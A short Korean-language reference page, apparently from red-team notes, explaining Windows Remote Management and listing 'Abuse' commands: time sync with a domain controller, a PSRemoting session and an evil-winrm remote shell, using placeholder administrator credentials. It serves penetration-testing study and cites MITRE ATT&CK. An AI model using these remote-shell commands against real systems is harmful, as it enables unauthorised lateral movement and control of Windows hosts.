WinRM

WinRM(Windows Remote Management)은 Windows에서 원격 명령 실행을 위한 SOAP 기반 프로토콜입니다.

클라이언트는 커버로스 인증으로 HTTP 서비스 티켓을 요청하거나 NTLM 기반으로 인증하여 암호화된 HTTP 패킷으로 서버와 통신합니다.

Abuse

# 원격 서버와의 시간 동기화
w32tm /config /manualpeerlist:"AD01.CONTOSO.COM" /syncfromflags:manual /update
w32tm /resync /force

# PSRemoting으로 원격 쉘 획득
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('CONTOSO\Administrator', $pass)
Enter-PSSession -ComputerName DC01 -Credential $cred

# winrm 원격 쉘 획득
evil-winrm -i 192.168.1.11 -u Administrator -p 'Password123!'

References

Windows Remote Management | Red Team Notes

Remote Services: Windows Remote Management, Sub-technique T1021.006 - Enterprise | MITRE ATT&CK®

Windows Remote Management - Win32 appsMicrosoftLearn

PreviousWindows NextPsExec

Last updated 1 day ago

Was this helpful?